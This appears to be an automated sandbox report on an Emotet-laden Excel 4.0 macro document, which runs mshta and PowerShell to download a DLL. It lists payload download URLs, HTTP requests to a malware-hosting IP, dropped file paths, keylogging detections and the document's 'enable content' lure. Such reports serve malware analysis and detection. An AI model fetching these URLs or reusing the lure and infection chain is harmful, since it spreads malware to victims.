Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 12_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: CJ68000754184.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: CJ68000754184.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains OLE streams with names of living off the land binaries
Source: CJ68000754184.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: CJ68000754184.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: CJ68000754184.xls Initial sample: EXEC
Source: CJ68000754184.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068F8FD 9_2_0068F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068E991 9_2_0068E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068AB87 9_2_0068AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069907F 9_2_0069907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00682051 9_2_00682051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006A0056 9_2_006A0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00690001 9_2_00690001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00689011 9_2_00689011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006920BA 9_2_006920BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006870B3 9_2_006870B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068F09B 9_2_0068F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00694116 9_2_00694116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006851BB 9_2_006851BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006881B7 9_2_006881B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00682251 9_2_00682251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069A2E8 9_2_0069A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068E2CC 9_2_0068E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068B2C7 9_2_0068B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00685361 9_2_00685361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00684346 9_2_00684346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006A13AD 9_2_006A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069C3A0 9_2_0069C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069D389 9_2_0069D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069E395 9_2_0069E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069044F 9_2_0069044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069F435 9_2_0069F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006864E2 9_2_006864E2
